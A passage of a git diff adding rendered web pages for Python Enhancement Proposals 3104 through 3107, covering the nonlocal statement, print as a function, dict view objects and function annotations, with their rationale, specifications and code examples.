+    ns.score = score
+    label = Label(frame)
+    label.pack()
+    for i in [-10, -1, 1, 10]:
+        def increment(step=i):
+            ns.score = ns.score + step
+            label['text'] = ns.score
+        button = Button(frame, text='%+d' % i, command=increment)
+        button.pack()
+    return label
+
+
+

However, this workaround only highlights the shortcomings of existing +scopes: the purpose of a function is to encapsulate code in its own +namespace, so it seems unfortunate that the programmer should have to +create additional namespaces to make up for missing functionality in +the existing local scopes, and then have to decide whether each name +should reside in the real scope or the simulated scope.

+

Another common objection is that the desired functionality can be +written as a class instead, albeit somewhat more verbosely. One +rebuttal to this objection is that the existence of a different +implementation style is not a reason to leave a supported programming +construct (nested scopes) functionally incomplete. Python is +sometimes called a “multi-paradigm language” because it derives so +much strength, practical flexibility, and pedagogical power from its +support and graceful integration of multiple programming paradigms.

+

A proposal for scoping syntax appeared on Python-Dev as far back as +1994 [1], long before PEP 227’s support for nested scopes was +adopted. At the time, Guido’s response was:

+
+
This is dangerously close to introducing CSNS [classic static +nested scopes]. If you were to do so, your proposed semantics +of scoped seem alright. I still think there is not enough need +for CSNS to warrant this kind of construct …
+

After PEP 227, the “outer name rebinding discussion” has reappeared +on Python-Dev enough times that it has become a familiar event, +having recurred in its present form since at least 2003 [2]. +Although none of the language changes proposed in these discussions +have yet been adopted, Guido has acknowledged that a language change +is worth considering [12].

+
+
+

Other Languages

+

To provide some background, this section describes how some other +languages handle nested scopes and rebinding.

+
+

JavaScript, Perl, Scheme, Smalltalk, GNU C, C# 2.0

+

These languages use variable declarations to indicate scope. In +JavaScript, a lexically scoped variable is declared with the var +keyword; undeclared variable names are assumed to be global. In +Perl, a lexically scoped variable is declared with the my +keyword; undeclared variable names are assumed to be global. In +Scheme, all variables must be declared (with define or let, +or as formal parameters). In Smalltalk, any block can begin by +declaring a list of local variable names between vertical bars. +C and C# require type declarations for all variables. For all these +cases, the variable belongs to the scope containing the declaration.

+
+
+

Ruby (as of 1.8)

+

Ruby is an instructive example because it appears to be the only +other currently popular language that, like Python, tries to support +statically nested scopes without requiring variable declarations, and +thus has to come up with an unusual solution. Functions in Ruby can +contain other function definitions, and they can also contain code +blocks enclosed in curly braces. Blocks have access to outer +variables, but nested functions do not. Within a block, an +assignment to a name implies a declaration of a local variable only +if it would not shadow a name already bound in an outer scope; +otherwise assignment is interpreted as rebinding of the outer name. +Ruby’s scoping syntax and rules have also been debated at great +length, and changes seem likely in Ruby 2.0 [28].

+
+
+
+

Overview of Proposals

+

There have been many different proposals on Python-Dev for ways to +rebind names in outer scopes. They all fall into two categories: +new syntax in the scope where the name is bound, or new syntax in +the scope where the name is used.

+
+

New Syntax in the Binding (Outer) Scope

+
+

Scope Override Declaration

+

The proposals in this category all suggest a new kind of declaration +statement similar to JavaScript’s var. A few possible keywords +have been proposed for this purpose:

+
    +
  • scoped x [1]
  • +
  • var x [15]
  • +
  • my x [13]
  • +
+

In all these proposals, a declaration such as var x in a +particular scope S would cause all references to x in scopes +nested within S to refer to the x bound in S.

+

The primary objection to this category of proposals is that the +meaning of a function definition would become context-sensitive. +Moving a function definition inside some other block could cause any +of the local name references in the function to become nonlocal, due +to declarations in the enclosing block. For blocks in Ruby 1.8, +this is actually the case; in the following example, the two setters +have different effects even though they look identical:

+
setter1 = proc { | x | y = x }      # y is local here
+y = 13
+setter2 = proc { | x | y = x }      # y is nonlocal here
+setter1.call(99)
+puts y                              # prints 13
+setter2.call(77)
+puts y                              # prints 77
+
+
+

Note that although this proposal resembles declarations in JavaScript +and Perl, the effect on the language is different because in those +languages undeclared variables are global by default, whereas in +Python undeclared variables are local by default. Thus, moving +a function inside some other block in JavaScript or Perl can only +reduce the scope of a previously global name reference, whereas in +Python with this proposal, it could expand the scope of a previously +local name reference.

+
+
+

Required Variable Declaration

+

A more radical proposal [21] suggests removing Python’s scope-guessing +convention altogether and requiring that all names be declared in the +scope where they are to be bound, much like Scheme. With this +proposal, var x = 3 would both declare x to belong to the +local scope and bind it, whereas x = 3 would rebind the existing +visible x. In a context without an enclosing scope containing a +var x declaration, the statement x = 3 would be statically +determined to be illegal.

+

This proposal yields a simple and consistent model, but it would be +incompatible with all existing Python code.

+
+
+
+

New Syntax in the Referring (Inner) Scope

+

There are three kinds of proposals in this category.

+
+

Outer Reference Expression

+

This type of proposal suggests a new way of referring to a variable +in an outer scope when using the variable in an expression. One +syntax that has been suggested for this is .x [7], which would +refer to x without creating a local binding for it. A concern +with this proposal is that in many contexts x and .x could +be used interchangeably, which would confuse the reader [31]. A +closely related idea is to use multiple dots to specify the number +of scope levels to ascend [8], but most consider this too error-prone +[17].

+
+
+

Rebinding Operator

+

This proposal suggests a new assignment-like operator that rebinds +a name without declaring the name to be local [2]. Whereas the +statement x = 3 both declares x a local variable and binds +it to 3, the statement x := 3 would change the existing binding +of x without declaring it local.

+

This is a simple solution, but according to PEP 3099 it has been +rejected (perhaps because it would be too easy to miss or to confuse +with =).

+
+
+

Scope Override Declaration

+

The proposals in this category suggest a new kind of declaration +statement in the inner scope that prevents a name from becoming +local. This statement would be similar in nature to the global +statement, but instead of making the name refer to a binding in the +top module-level scope, it would make the name refer to the binding +in the nearest enclosing scope.

+

This approach is attractive due to its parallel with a familiar +Python construct, and because it retains context-independence for +function definitions.

+

This approach also has advantages from a security and debugging +perspective. The resulting Python would not only match the +functionality of other nested-scope languages but would do so with a +syntax that is arguably even better for defensive programming. In +most other languages, a declaration contracts the scope of an +existing name, so inadvertently omitting the declaration could yield +farther-reaching (i.e. more dangerous) effects than expected. In +Python with this proposal, the extra effort of adding the declaration +is aligned with the increased risk of non-local effects (i.e. the +path of least resistance is the safer path).

+

Many spellings have been suggested for such a declaration:

+
    +
  • scoped x [1]
  • +
  • global x in f [3] (explicitly specify which scope)
  • +
  • free x [5]
  • +
  • outer x [6]
  • +
  • use x [9]
  • +
  • global x [10] (change the meaning of global)
  • +
  • nonlocal x [11]
  • +
  • global x outer [18]
  • +
  • global in x [18]
  • +
  • not global x [18]
  • +
  • extern x [20]
  • +
  • ref x [22]
  • +
  • refer x [22]
  • +
  • share x [22]
  • +
  • sharing x [22]
  • +
  • common x [22]
  • +
  • using x [22]
  • +
  • borrow x [22]
  • +
  • reuse x [23]
  • +
  • scope f x [25] (explicitly specify which scope)
  • +
+

The most commonly discussed choices appear to be outer, +global, and nonlocal. outer is already used as both a +variable name and an attribute name in the standard library. The +word global has a conflicting meaning, because “global variable” +is generally understood to mean a variable with top-level scope [27]. +In C, the keyword extern means that a name refers to a variable +in a different compilation unit. While nonlocal is a bit long +and less pleasant-sounding than some of the other options, it does +have precisely the correct meaning: it declares a name not local.

+
+
+
+
+

Proposed Solution

+

The solution proposed by this PEP is to add a scope override +declaration in the referring (inner) scope. Guido has expressed a +preference for this category of solution on Python-Dev [14] and has +shown approval for nonlocal as the keyword [19].

+

The proposed declaration:

+
nonlocal x
+
+
+

prevents x from becoming a local name in the current scope. All +occurrences of x in the current scope will refer to the x +bound in an outer enclosing scope. As with global, multiple +names are permitted:

+
nonlocal x, y, z
+
+
+
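For illustration, here is how the declaration behaves in a small, self-contained example (the names make_counter and increment are ours, not from the PEP; this is a minimal sketch of the semantics described above):

def make_counter():
    count = 0
    def increment(step=1):
        nonlocal count          # rebind count in make_counter's scope
        count += step
        return count
    return increment

inc = make_counter()
inc()   # returns 1
inc()   # returns 2 -- the binding in make_counter is updated

Without the nonlocal declaration, the assignment to count would make it local to increment and raise UnboundLocalError, exactly as in the make_scoreboard example in the Rationale.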

If there is no pre-existing binding in an enclosing scope, the +compiler raises a SyntaxError. (It may be a bit of a stretch to +call this a syntax error, but so far SyntaxError is used for all +compile-time errors, including, for example, __future__ import +with an unknown feature name.) Guido has said that this kind of +declaration in the absence of an outer binding should be considered +an error [16].

+

If a nonlocal declaration collides with the name of a formal +parameter in the local scope, the compiler raises a SyntaxError.

+

A shorthand form is also permitted, in which nonlocal is +prepended to an assignment or augmented assignment:

+
nonlocal x = 3
+
+
+

The above has exactly the same meaning as nonlocal x; x = 3. +(Guido supports a similar form of the global statement [24].)

+

On the left side of the shorthand form, only identifiers are allowed, +not target expressions like x[0]. Otherwise, all forms of +assignment are allowed. The proposed grammar of the nonlocal +statement is:

+
nonlocal_stmt ::=
+    "nonlocal" identifier ("," identifier)*
+               ["=" (target_list "=")+ expression_list]
+  | "nonlocal" identifier augop expression_list
+
+
+

The rationale for allowing all these forms of assignment is that it +simplifies understanding of the nonlocal statement. Separating +the shorthand form into a declaration and an assignment is sufficient +to understand what it means and whether it is valid.

+
+

Note

+

The shorthand syntax was not added in the original implementation +of the PEP. Later discussions [29] [30] concluded this syntax +should not be implemented.

+
+
+
+

Backward Compatibility

+

This PEP targets Python 3000, as suggested by Guido [19]. However, +others have noted that some options considered in this PEP may be +small enough changes to be feasible in Python 2.x [26], in which +case this PEP could possibly be moved to be a 2.x series PEP.

+

As a (very rough) measure of the impact of introducing a new keyword, +here is the number of times that some of the proposed keywords appear +as identifiers in the standard library, according to a scan of the +Python SVN repository on November 5, 2006:

+
nonlocal    0
+use         2
+using       3
+reuse       4
+free        8
+outer     147
+
+
+

global appears 214 times as an existing keyword. As a measure +of the impact of using global as the outer-scope keyword, there +are 18 files in the standard library that would break as a result +of such a change (because a function declares a variable global +before that variable has been introduced in the global scope):

+
cgi.py
+dummy_thread.py
+mhlib.py
+mimetypes.py
+idlelib/PyShell.py
+idlelib/run.py
+msilib/__init__.py
+test/inspect_fodder.py
+test/test_compiler.py
+test/test_decimal.py
+test/test_descr.py
+test/test_dummy_threading.py
+test/test_fileinput.py
+test/test_global.py (not counted: this tests the keyword itself)
+test/test_grammar.py (not counted: this tests the keyword itself)
+test/test_itertools.py
+test/test_multifile.py
+test/test_scope.py (not counted: this tests the keyword itself)
+test/test_threaded_import.py
+test/test_threadsignals.py
+test/test_warnings.py
+
+
+
+
+

References

+ +

[15] Explicit Lexical Scoping (pre-PEP?) (Guido van Rossum) + https://mail.python.org/pipermail/python-dev/2006-July/066995.html

+ +
+
+

Acknowledgements

+

The ideas and proposals mentioned in this PEP are gleaned from +countless Python-Dev postings. Thanks to Jim Jewett, Mike Orr, +Jason Orendorff, and Christian Tanzer for suggesting specific +edits to this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3104.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3105/index.html b/pep-3105/index.html new file mode 100644 index 00000000000..41064b146d2 --- /dev/null +++ b/pep-3105/index.html @@ -0,0 +1,257 @@ + PEP 3105 – Make print a function | peps.python.org
+
+


+ + +
+
+
+

PEP 3105 – Make print a function

+
+
Author:
+
Georg Brandl <georg at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
19-Nov-2006
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

The title says it all – this PEP proposes a new print() builtin +that replaces the print statement and suggests a specific signature +for the new function.

+
+
+

Rationale

+

The print statement has long appeared on lists of dubious language +features that are to be removed in Python 3000, such as Guido’s “Python +Regrets” presentation [1]. As such, the objective of this PEP is not +new, though it might become much disputed among Python developers.

+

The following arguments for a print() function are distilled from a +python-3000 message by Guido himself [2]:

+
    +
  • print is the only application-level functionality that has a +statement dedicated to it. Within Python’s world, syntax is generally +used as a last resort, when something can’t be done without help from +the compiler. Print doesn’t qualify for such an exception.
  • +
  • At some point in application development one quite often feels the need +to replace print output by something more sophisticated, like +logging calls or calls into some other I/O library. With a print() +function, this is a straightforward string replacement; today it is +a mess adding all those parentheses and possibly converting >>stream +style syntax.
  • +
  • Having special syntax for print puts up a much larger barrier for +evolution, e.g. a hypothetical new printf() function is not too +far fetched when it will coexist with a print() function.
  • +
  • There’s no easy way to convert print statements into another call +if one needs a different separator, not spaces, or none at all. +Also, there’s no easy way at all to conveniently print objects with +some other separator than a space.
  • +
  • If print() is a function, it would be much easier to replace it within +one module (just def print(*args):...) or even throughout a program +(e.g. by putting a different function in __builtin__.print). As it is, +one can do this by writing a class with a write() method and +assigning that to sys.stdout – that’s not bad, but definitely a much +larger conceptual leap, and it works at a different level than print.
  • +
+
+
+

Specification

+

The signature for print(), taken from various mailings and recently +posted on the python-3000 list [3] is:

+
def print(*args, sep=' ', end='\n', file=None)
+
+
+

A call like:

+
print(a, b, c, file=sys.stderr)
+
+
+

will be equivalent to today’s:

+
print >>sys.stderr, a, b, c
+
+
+

while the optional sep and end arguments specify what is printed +between and after the arguments, respectively.

+
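A brief sketch of how these keyword arguments combine (standard Python 3 behavior; the strings are arbitrary examples):

import sys

print("a", "b", "c")                      # writes "a b c\n"
print("a", "b", "c", sep="-", end="!\n")  # writes "a-b-c!\n"
print("diagnostic", file=sys.stderr)      # writes to sys.stderr instead of sys.stdout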

The softspace feature (a semi-secret attribute on files currently +used to tell print whether to insert a space before the first item) +will be removed. Therefore, there will not be a direct translation for +today’s:

+
print "a",
+print
+
+
+

which will not print a space between the "a" and the newline.

+
+
+

Backwards Compatibility

+

The changes proposed in this PEP will render most of today’s print +statements invalid. Only those which incidentally feature parentheses +around all of their arguments will continue to be valid Python syntax +in version 3.0, and of those, only the ones printing a single +parenthesized value will continue to do the same thing. For example, +in 2.x:

+
>>> print ("Hello")
+Hello
+>>> print ("Hello", "world")
+('Hello', 'world')
+
+
+

whereas in 3.0:

+
>>> print ("Hello")
+Hello
+>>> print ("Hello", "world")
+Hello world
+
+
+

Luckily, as it is a statement in Python 2, print can be detected +and replaced reliably and non-ambiguously by an automated tool, so +there should be no major porting problems (provided someone writes the +mentioned tool).

+
+
+

Implementation

+

The proposed changes were implemented in the Python 3000 branch in the +Subversion revisions 53685 to 53704. Most of the legacy code in the +library has been converted too, but it is an ongoing effort to catch +every print statement that may be left in the distribution.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3105.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3106/index.html b/pep-3106/index.html new file mode 100644 index 00000000000..ca830d4bcf0 --- /dev/null +++ b/pep-3106/index.html @@ -0,0 +1,434 @@ + PEP 3106 – Revamping dict.keys(), .values() and .items() | peps.python.org
+
+


+ + +
+
+
+

PEP 3106 – Revamping dict.keys(), .values() and .items()

+
+
Author:
+
Guido van Rossum
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
19-Dec-2006
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

This PEP proposes to change the .keys(), .values() and .items() +methods of the built-in dict type to return a set-like or unordered +container object whose contents are derived from the underlying +dictionary rather than a list which is a copy of the keys, etc.; and +to remove the .iterkeys(), .itervalues() and .iteritems() methods.

+

The approach is inspired by that taken in the Java Collections +Framework [1].

+
+
+

Introduction

+

It has long been the plan to change the .keys(), .values() and +.items() methods of the built-in dict type to return a more +lightweight object than a list, and to get rid of .iterkeys(), +.itervalues() and .iteritems(). The idea is that code that currently +(in 2.x) reads:

+
for k, v in d.iteritems(): ...
+
+
+

should be rewritten as:

+
for k, v in d.items(): ...
+
+
+

(and similar for .itervalues() and .iterkeys(), except the latter is +redundant since we can write that loop as for k in d.)

+

Code that currently reads:

+
a = d.keys()    # assume we really want a list here
+
+
+

(etc.) should be rewritten as

+
+
a = list(d.keys())
+

There are (at least) two ways to accomplish this. The original plan +was to simply let .keys(), .values() and .items() return an iterator, +i.e. exactly what iterkeys(), itervalues() and iteritems() return in +Python 2.x. However, the Java Collections Framework [1] suggests +that a better solution is possible: the methods return objects with +set behavior (for .keys() and .items()) or multiset (== bag) behavior +(for .values()) that do not contain copies of the keys, values or +items, but rather reference the underlying dict and pull their values +out of the dict as needed.

+

The advantage of this approach is that one can still write code like +this:

+
a = d.items()
+for k, v in a: ...
+# And later, again:
+for k, v in a: ...
+
+
+

Effectively, iter(d.keys()) (etc.) in Python 3.0 will do what +d.iterkeys() (etc.) does in Python 2.x; but in most contexts we don’t +have to write the iter() call because it is implied by a for-loop.

+

The objects returned by the .keys() and .items() methods behave like +sets. The object returned by the values() method behaves like a much +simpler unordered collection – it cannot be a set because duplicate +values are possible.

+

Because of the set behavior, it will be possible to check whether two +dicts have the same keys by simply testing:

+
if a.keys() == b.keys(): ...
+
+
+

and similarly for .items().

+
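A short sketch of the set operations this enables (the dict contents are arbitrary examples; this matches the behavior that shipped in Python 3):

a = {'x': 1, 'y': 2}
b = {'y': 2, 'z': 3}

a.keys() & b.keys()    # {'y'} -- intersection returns a real set
a.keys() - b.keys()    # {'x'}
a.items() & b.items()  # {('y', 2)} -- items compare as (key, value) pairs
a.keys() == b.keys()   # False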

These operations are thread-safe only to the extent that using them in +a thread-unsafe way may cause an exception but will not cause +corruption of the internal representation.

+

As in Python 2.x, mutating a dict while iterating over it using an +iterator has an undefined effect and will in most cases raise a +RuntimeError exception. (This is similar to the guarantees made by +the Java Collections Framework.)

+
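For example (CPython 3 raises the exception as soon as the resized dict's iterator is advanced):

d = {'a': 1, 'b': 2}
it = iter(d.keys())
d['c'] = 3     # mutate while an iterator is outstanding
next(it)       # RuntimeError: dictionary changed size during iteration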

The objects returned by .keys() and .items() are fully interoperable +with instances of the built-in set and frozenset types; for example:

+
set(d.keys()) == d.keys()
+
+
+

is guaranteed to be True (except when d is being modified +simultaneously by another thread).

+
+
+

Specification

+

I’m using pseudo-code to specify the semantics:

+
class dict:
+
+    # Omitting all other dict methods for brevity.
+    # The .iterkeys(), .itervalues() and .iteritems() methods
+    # will be removed.
+
+    def keys(self):
+        return d_keys(self)
+
+    def items(self):
+        return d_items(self)
+
+    def values(self):
+        return d_values(self)
+
+class d_keys:
+
+    def __init__(self, d):
+        self.__d = d
+
+    def __len__(self):
+        return len(self.__d)
+
+    def __contains__(self, key):
+        return key in self.__d
+
+    def __iter__(self):
+        for key in self.__d:
+            yield key
+
+    # The following operations should be implemented to be
+    # compatible with sets; this can be done by exploiting
+    # the above primitive operations:
+    #
+    #   <, <=, ==, !=, >=, > (returning a bool)
+    #   &, |, ^, - (returning a new, real set object)
+    #
+    # as well as their method counterparts (.union(), etc.).
+    #
+    # To specify the semantics, we can specify x == y as:
+    #
+    #   set(x) == set(y)   if both x and y are d_keys instances
+    #   set(x) == y        if x is a d_keys instance
+    #   x == set(y)        if y is a d_keys instance
+    #
+    # and so on for all other operations.
+
+class d_items:
+
+    def __init__(self, d):
+        self.__d = d
+
+    def __len__(self):
+        return len(self.__d)
+
+    def __contains__(self, item):
+        key, value = item   # unpack the (key, value) pair explicitly
+        return key in self.__d and self.__d[key] == value
+
+    def __iter__(self):
+        for key in self.__d:
+            yield key, self.__d[key]
+
+    # As well as the set operations mentioned for d_keys above.
+    # However the specifications suggested there will not work if
+    # the values aren't hashable.  Fortunately, the operations can
+    # still be implemented efficiently.  For example, this is how
+    # intersection can be specified:
+
+    def __and__(self, other):
+        if isinstance(other, (set, frozenset, d_keys)):
+            result = set()
+            for item in other:
+                if item in self:
+                    result.add(item)
+            return result
+        if not isinstance(other, d_items):
+            return NotImplemented
+        d = {}
+        if len(other) < len(self):
+            self, other = other, self
+        for item in self:
+            if item in other:
+                key, value = item
+                d[key] = value
+        return d.items()
+
+    # And here is equality:
+
+    def __eq__(self, other):
+        if isinstance(other, (set, frozenset, d_keys)):
+            if len(self) != len(other):
+                return False
+            for item in other:
+                if item not in self:
+                    return False
+            return True
+        if not isinstance(other, d_items):
+            return NotImplemented
+        # XXX We could also just compare the underlying dicts...
+        if len(self) != len(other):
+            return False
+        for item in self:
+            if item not in other:
+                return False
+        return True
+
+    def __ne__(self, other):
+        # XXX Perhaps object.__ne__() should be defined this way.
+        result = self.__eq__(other)
+        if result is not NotImplemented:
+            result = not result
+        return result
+
+class d_values:
+
+    def __init__(self, d):
+        self.__d = d
+
+    def __len__(self):
+        return len(self.__d)
+
+    def __contains__(self, value):
+        # This is slow, and it's what "x in y" uses as a fallback
+        # if __contains__ is not defined; but I'd rather make it
+        # explicit that it is supported.
+        for v in self:
+            if v == value:
+                return True
+        return False
+
+    def __iter__(self):
+        for key in self.__d:
+            yield self.__d[key]
+
+    def __eq__(self, other):
+        if not isinstance(other, d_values):
+            return NotImplemented
+        if len(self) != len(other):
+            return False
+        # XXX Sometimes this could be optimized, but these are the
+        # semantics: we can't depend on the values to be hashable
+        # or comparable.
+        olist = list(other)
+        for x in self:
+            try:
+                olist.remove(x)
+            except ValueError:
+                return False
+        assert olist == []
+        return True
+
+    def __ne__(self, other):
+        result = self.__eq__(other)
+        if result is not NotImplemented:
+            result = not result
+        return result
+
+
+

Notes:

+

The view objects are not directly mutable, but don’t implement +__hash__(); their value can change if the underlying dict is mutated.

+
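A minimal sketch of this dynamic behavior (arbitrary example data):

d = {'a': 1}
keys = d.keys()
'b' in keys        # False
d['b'] = 2
'b' in keys        # True -- the view reflects the mutation
sorted(keys)       # ['a', 'b']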

The only requirements on the underlying dict are that it implements +__getitem__(), __contains__(), __iter__(), and __len__().

+

We don’t implement .copy() – the presence of a .copy() +method suggests that the copy has the same type as the original, but +that’s not feasible without copying the underlying dict. If you want +a copy of a specific type, like list or set, you can just pass one +of the above to the list() or set() constructor.

+

The specification implies that the order in which items +are returned by .keys(), .values() and .items() is the same (just as +it was in Python 2.x), because the order is all derived from the dict +iterator (which is presumably arbitrary but stable as long as a dict +isn’t modified). This can be expressed by the following invariant:

+
list(d.items()) == list(zip(d.keys(), d.values()))
+
+
+
+
+

Open Issues

+

Do we need more of a motivation? I would think that being able to do +set operations on keys and items without having to copy them should +speak for itself.

+

I’ve left out the implementation of various set operations. These +could still present small surprises.

+

It would be okay if multiple calls to d.keys() (etc.) returned the +same object, since the object’s only state is the dict to which it +refers. Is this worth having extra slots in the dict object for? +Should that be a weak reference or should the d_keys (etc.) object +live forever once created? Strawman: probably not worth the extra +slots in every dict.

+

Should d_keys, d_values and d_items have a public instance variable or +method through which one can retrieve the underlying dict? Strawman: +yes (but what should it be called?).

+

I’m soliciting better names than d_keys, d_values and d_items. These +classes could be public so that their implementations could be reused +by the .keys(), .values() and .items() methods of other mappings. Or +should they?

+

Should the d_keys, d_values and d_items classes be reusable? +Strawman: yes.

+

Should they be subclassable? Strawman: yes (but see below).

+

A particularly nasty issue is whether operations that are specified in +terms of other operations (e.g. .discard()) must really be implemented +in terms of those other operations; this may appear irrelevant but it +becomes relevant if these classes are ever subclassed. Historically, +Python has a really poor track record of specifying the semantics of +highly optimized built-in types clearly in such cases; my strawman is +to continue that trend. Subclassing may still be useful to add new +methods, for example.

+

I’ll leave the decisions (especially about naming) up to whoever +submits a working implementation.

+
+
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3106.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3107/index.html b/pep-3107/index.html new file mode 100644 index 00000000000..e78e786f1a4 --- /dev/null +++ b/pep-3107/index.html @@ -0,0 +1,475 @@ + PEP 3107 – Function Annotations | peps.python.org
+
+


+ + +
+
+
+

PEP 3107 – Function Annotations

+
+
Author:
+
Collin Winter <collinwinter at google.com>, +Tony Lownds <tony at lownds.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
02-Dec-2006
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

This PEP introduces a syntax for adding arbitrary metadata annotations +to Python functions [1].

+
+
+

Rationale

+

Because Python’s 2.x series lacks a standard way of annotating a +function’s parameters and return values, a variety of tools +and libraries have appeared to fill this gap. Some +utilise the decorators introduced in PEP 318, while others parse a +function’s docstring, looking for annotations there.

+

This PEP aims to provide a single, standard way of specifying this +information, reducing the confusion caused by the wide variation in +mechanism and syntax that has existed until this point.

+
+
+

Fundamentals of Function Annotations

+

Before launching into a discussion of the precise ins and outs of +Python 3.0’s function annotations, let’s first talk broadly about +what annotations are and are not:

+
    +
  1. Function annotations, both for parameters and return values, are +completely optional.
  2. +
  3. Function annotations are nothing more than a way of associating +arbitrary Python expressions with various parts of a function at +compile-time.

    By itself, Python does not attach any particular meaning or +significance to annotations. Left to its own, Python simply makes +these expressions available as described in Accessing Function +Annotations below.

    +

    The only way that annotations take on meaning is when they are +interpreted by third-party libraries. These annotation consumers +can do anything they want with a function’s annotations. For +example, one library might use string-based annotations to provide +improved help messages, like so:

    +
    def compile(source: "something compilable",
    +            filename: "where the compilable thing comes from",
    +            mode: "is this a single statement or a suite?"):
    +    ...
    +
    +
    +

    Another library might be used to provide typechecking for Python +functions and methods. This library could use annotations to +indicate the function’s expected input and return types, possibly +something like:

    +
    def haul(item: Haulable, *vargs: PackAnimal) -> Distance:
    +    ...
    +
    +
    +

    However, neither the strings in the first example nor the +type information in the second example have any meaning on their +own; meaning comes from third-party libraries alone.

    +
  4. +
  5. Following from point 2, this PEP makes no attempt to introduce +any kind of standard semantics, even for the built-in types. +This work will be left to third-party libraries.
  6. +
+
+
+

Syntax

+
+

Parameters

+

Annotations for parameters take the form of optional expressions that +follow the parameter name:

+
def foo(a: expression, b: expression = 5):
+    ...
+
+
+

In pseudo-grammar, parameters now look like identifier [: +expression] [= expression]. That is, annotations always precede a +parameter’s default value and both annotations and default values are +optional. Just like how equal signs are used to indicate a default +value, colons are used to mark annotations. All annotation +expressions are evaluated when the function definition is executed, +just like default values.

+
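To make the evaluation time concrete, here is a small sketch (the function name and annotation expression are ours, chosen only to show definition-time evaluation):

import time

def snapshot(t: time.time()):       # time.time() runs once, when 'def' executes
    ...

snapshot.__annotations__['t']       # a fixed float; later calls to snapshot()
                                    # do not re-evaluate the annotation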

Annotations for excess parameters (i.e., *args and **kwargs) +are indicated similarly:

+
def foo(*args: expression, **kwargs: expression):
+    ...
+
+
+

Annotations for nested parameters always follow the name of the +parameter, not the last parenthesis. Annotating all parameters of a +nested parameter is not required:

+
def foo((x1, y1: expression),
+        (x2: expression, y2: expression)=(None, None)):
+    ...
+
+
+
+
+

Return Values

+

The examples thus far have omitted examples of how to annotate the +type of a function’s return value. This is done like so:

+
def sum() -> expression:
+    ...
+
+
+

That is, the parameter list can now be followed by a literal -> +and a Python expression. Like the annotations for parameters, this +expression will be evaluated when the function definition is executed.

+

The grammar for function definitions [11] is now:

+
decorator: '@' dotted_name [ '(' [arglist] ')' ] NEWLINE
+decorators: decorator+
+funcdef: [decorators] 'def' NAME parameters ['->' test] ':' suite
+parameters: '(' [typedargslist] ')'
+typedargslist: ((tfpdef ['=' test] ',')*
+                ('*' [tname] (',' tname ['=' test])* [',' '**' tname]
+                 | '**' tname)
+                | tfpdef ['=' test] (',' tfpdef ['=' test])* [','])
+tname: NAME [':' test]
+tfpdef: tname | '(' tfplist ')'
+tfplist: tfpdef (',' tfpdef)* [',']
+
+
+
+
+

Lambda

+

lambda’s syntax does not support annotations. The syntax of +lambda could be changed to support annotations, by requiring +parentheses around the parameter list. However it was decided +[12] not to make this change because:

+
    +
  1. It would be an incompatible change.
  2. +
  3. Lambdas are neutered anyway.
  4. +
  5. The lambda can always be changed to a function.
  6. +
+
+
+
+

Accessing Function Annotations

+

Once compiled, a function’s annotations are available via the +function’s __annotations__ attribute. This attribute is +a mutable dictionary, mapping parameter names to an object +representing the evaluated annotation expression.

+

There is a special key in the __annotations__ mapping, +"return". This key is present only if an annotation was supplied +for the function’s return value.

+

For example, the following annotation:

+
def foo(a: 'x', b: 5 + 6, c: list) -> max(2, 9):
+    ...
+
+
+

would result in an __annotations__ mapping of

+
{'a': 'x',
+ 'b': 11,
+ 'c': list,
+ 'return': 9}
+
+
+

The return key was chosen because it cannot conflict with the name +of a parameter; any attempt to use return as a parameter name +would result in a SyntaxError.

+

__annotations__ is an empty, mutable dictionary if there are no +annotations on the function or if the function was created from +a lambda expression.

+
+
+

Use Cases

+

In the course of discussing annotations, a number of use-cases have +been raised. Some of these are presented here, grouped by what kind +of information they convey. Also included are examples of existing +products and packages that could make use of annotations.

+
    +
  • Providing typing information
      +
    • Type checking ([3], [4])
    • +
    • Let IDEs show what types a function expects and returns ([16])
    • +
    • Function overloading / generic functions ([21])
    • +
    • Foreign-language bridges ([17], [18])
    • +
    • Adaptation ([20], [19])
    • +
    • Predicate logic functions
    • +
    • Database query mapping
    • +
    • RPC parameter marshaling ([22])
    • +
    +
  • +
  • Other information
      +
    • Documentation for parameters and return values ([23])
    • +
    +
  • +
+
+
+

Standard Library

+
+

pydoc and inspect

+

The pydoc module should display the function annotations when +displaying help for a function. The inspect module should change +to support annotations.

+
+
+
+

Relation to Other PEPs

+
+

Function Signature Objects (PEP 362)

+

Function Signature Objects should expose the function’s annotations. +The Parameter object may change or other changes may be warranted.

+
+
+
+

Implementation

+

A reference implementation has been checked into the py3k (formerly +“p3yk”) branch as revision 53170 [10].

+
+
+

Rejected Proposals

+
    +
  • The BDFL rejected the author’s idea for a special syntax for adding +annotations to generators as being “too ugly” [2].
  • +
  • Though discussed early on ([5], [6]), including +special objects in the stdlib for annotating generator functions and +higher-order functions was ultimately rejected as being more +appropriate for third-party libraries; including them in the +standard library raised too many thorny issues.
  • +
  • Despite considerable discussion about a standard type +parameterisation syntax, it was decided that this should also be +left to third-party libraries. ([7], +[8], [9]).
  • +
  • Despite yet more discussion, it was decided not to standardize +a mechanism for annotation interoperability. Standardizing +interoperability conventions at this point would be premature. +We would rather let these conventions develop organically, based +on real-world usage and necessity, than try to force all users +into some contrived scheme. ([13], [14], +[15]).
  • +
+
+
+

References and Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3107.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
